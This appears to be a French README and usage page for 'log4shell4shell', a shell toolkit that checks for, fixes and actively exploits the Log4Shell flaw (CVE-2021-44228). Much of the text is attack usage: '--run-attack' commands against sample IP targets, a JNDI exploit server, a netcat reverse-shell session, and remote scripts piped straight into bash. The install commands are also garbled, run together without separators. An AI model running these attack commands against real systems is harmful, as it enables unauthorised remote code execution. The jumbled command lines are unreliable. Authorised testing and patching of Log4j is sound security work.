
Log4shell - Multi-Toolkit. Trouver, corriger et tester les vulnérabilités CVE-2021-44228 possibles - fournit un environnement complet de test/attaque LOG4SHELL sur shell
Log4j - Multitool. Trouver et corriger les vulnérabilités possibles CVE-2021-44228 - fournit un environnement complet de test/attaque LOG4SHELL

apt update ; apt install default-jre screen python3-pip bash curlzypper ref ; zypper in default-jre screen python3-pip bash curlyum clean; yum install default-jre screen python3-pip bash curlpkg install default-jre screen python3-pip curl/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pipwget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
Exécutez screen -r l4s4s-ldap-srv et/ou screen -r l4s4s-nc-rsh pour voir quelques informations d'attaque dans le shell du serveur d'exploitation :
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
_| _| _| _| _| _| _| _| _| _| _|
_| _|_| _|_|_| _| _| _|_|_| _|_|_| _|_| _| _| _| _| _|_|_| _|_|_| _|_| _| _|
_| _| _| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _|
_| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_| _| _| _| _| _|
_|_|_|_| _|_| _|_|_| _| _|_|_| _| _| _|_|_| _| _| _| _|_|_| _| _| _|_|_| _| _|
_|
_|_|
> Exécution du framework Log4shell et de la boîte à outils de vérification sur le shell v0.1a (C) 2021 suuhm
Mauvaise entrée ! Veuillez saisir l'une de ces options :
Utilisation : ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>
--get-powershell-finder
--check-system
--fix-log4j
--run-dummy-server <JNDIExploit.*.zip>
--run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
--python-scan <command>
Exécutez simplement mon script d'aide (--list-versions) : ./python-upgrader.sh
Exécutez simplement dans Powershell (mode admin) : .\set_windows_fix.ps1
Le projet log4shell4shell est conçu uniquement à des fins éducatives et de tests éthiques. L'utilisation de log4j-scan pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, nationales et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou dommage causé par ce programme.